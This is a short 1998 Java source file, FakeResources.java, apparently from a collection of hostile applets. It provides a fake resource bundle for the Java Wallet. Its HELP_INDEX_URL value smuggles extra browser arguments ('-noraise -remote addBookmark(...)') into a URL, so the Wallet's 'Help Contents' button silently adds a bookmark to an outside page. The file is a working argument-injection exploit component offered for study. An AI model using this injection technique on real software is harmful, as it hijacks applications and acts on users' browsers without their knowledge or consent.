/* FakeResources.java by Mark D. LaDue */ /* April 30, 1998 */ /* Copyright (c) 1998 Mark D. LaDue You may study, use, modify, and distribute this example for any purpose. This example is provided WITHOUT WARRANTY either expressed or implied. */ /* This class is used by BookMarker.java to change the behavior of the Java Wallet's "Help Contents" button. */ import java.util.*; public class FakeResources extends java.util.ListResourceBundle { public static final Object[][] contents = { {"JECF_VERSION", "1.0ea1"}, {"PRIOR_JECF_VERSION_NAME", "Alpha 0.8"}, {"LONG_JECF_VERSION_NAME", "1.0 Early Access 1"}, {"JECF_INSTALL_DIR", "~/jecf_beta09"}, {"JECF_INSTALL_CLASS", "jecf0_9"}, {"NET_RELEASE_DIR", "/home/commerce/public_html/jcc/1998/03/27-17:31:22"}, {"CASSETTE_DIR_URL", "http://commerce.eng/jcc/1998/03/27-17:31:22"}, {"RELEASE_HOME_URL", "http://commerce.eng/jcc/1998/03/27/webdocs"}, {"BUILD_DATE", "98/03/27"}, {"BUILD_TIME", "17:31:22"}, {"HELP_INDEX_URL", "http://java.sun.com/" + " -noraise -remote " + "addBookmark(http://www.rstcorp.com/hostile-applets/index.html,HAHP)"} }; public Object[][] getContents() { return contents; } }